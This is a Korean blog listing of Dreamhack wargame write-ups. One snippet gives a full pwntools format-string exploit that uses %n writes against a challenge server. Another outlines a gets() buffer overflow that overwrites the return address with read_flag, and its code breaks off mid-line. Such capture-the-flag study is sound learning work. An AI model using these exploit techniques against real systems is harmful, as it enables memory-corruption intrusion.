목록Dreamhack (6)
보호되어 있는 글입니다.

https://dreamhack.io/wargame/challenges/5/

https://dreamhack.io/wargame/challenges/4/ dec(34297) 0x10804 - 0x8609 = 0x81fb -> dec(33275) exploit code from pwn import * p = remote("host1.dreamhack.games", 19427) code = '\x90'*4 +'\x24\xa0\x04\x08'+'\x90'*4+'\x26\xa0\x04\x08' code += "%34297d%n" + "%33275d%n" p.send(code) p.interactive() FSB가 처음에 이해가 안 가도 하다 보면 이해가 간다. 많이 풀어보도록 하자. FSB 공격 라이브러리가 있긴 한데 처음에 원리를 이해하기 위해 직접 해보도록 하자

https://dreamhack.io/wargame/challenges/3/ basic_exploitation_001 Description 이 문제는 서버에서 작동하고 있는 서비스(basicexploitation001)의 바이너리와 소스 코드가 주어집니다. 프로그램의 취약점을 찾고 익스플로잇해 "flag" 파일을 읽으세요. "flag" 파일의 내용을 dreamhack.io 풀어보겠다. 환경은 이렇다. 바로 코드를 확인해보자 gets함수를 사용하여 bof를 일으키고 ret주소에 read_flag 주소로 덮어버리도록 하겠다. 먼저 read_flag함수의 주소를 얻어보자 주소를 겟 해버렸다. 페이로드는 dummy*0x80 + sfp(4) + read_flag(4)로 날리도록 하겠다. from pwn impor..